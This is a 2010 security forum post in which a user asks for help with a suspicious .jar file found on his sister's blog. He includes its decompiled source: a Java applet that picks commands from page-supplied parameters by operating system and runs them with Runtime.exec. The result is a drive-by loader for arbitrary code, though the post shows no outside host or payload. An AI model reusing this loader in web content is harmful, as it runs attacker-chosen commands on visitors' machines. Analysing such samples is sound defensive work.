Found a suspicious .jar file

Networking/Security Forums -> Viruses // Worms

Author: john_dLocation: Sao Paulo PostPosted: Thu Mar 25, 2010 2:26 pm    Post subject: Found a suspicious .jar file
    ----
I've been faced with what I might think being a virus on my sisters blog. The file is a .jar file that I couldn't understand what is was supposed to do, so I decompiled it and below you can see the results.

My knowledge of java is somewhat scarce, but I have used simple Java classes to do things like hello world and all the basic stuff. Anyway I'd like to know what it might be doing as I can't understand it myself.

Code:

import java.applet.Applet;
import java.io.IOException;
import java.awt.Dimension;
import java.awt.Graphics;
import java.awt.Image;

import javax.swing.ImageIcon;
import javax.swing.JFrame;
import javax.swing.JPanel;

public class Client extends Applet
{
  public void init()
  {
    String windows1 = getParameter("windows1");
    String windows2 = getParameter("windows2");
    String linux1 = getParameter("linux1");
    String linux2 = getParameter("linux2");
    String unix1 = getParameter("unix1");
    String unix2 = getParameter("unix2");
    String os = System.getProperty("os.name").toLowerCase();

    if (os.indexOf("win") >= 0)
    {
      Process w2;
      try
      {
        Process w1 = Runtime.getRuntime().exec(windows1);
        w2 = Runtime.getRuntime().exec(windows2);
      }
      catch (IOException e)
      {
        e.printStackTrace();
      }

    }

    if (os.indexOf("mac") >= 0)
    {
      Process u2;
      try
      {
        Process u1 = Runtime.getRuntime().exec(unix1);
        u2 = Runtime.getRuntime().exec(unix2);
      }
      catch (IOException e) {
        e.printStackTrace();
      }

    }

    if (os.indexOf("lin") < 0)
      return;
    Process l2;
    try
    {
      Process l1 = Runtime.getRuntime().exec(linux1);
      l2 = Runtime.getRuntime().exec(linux2);
    }
    catch (IOException e) {
      e.printStackTrace();
    }
  }
}



Networking/Security Forums -> Viruses // Worms


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group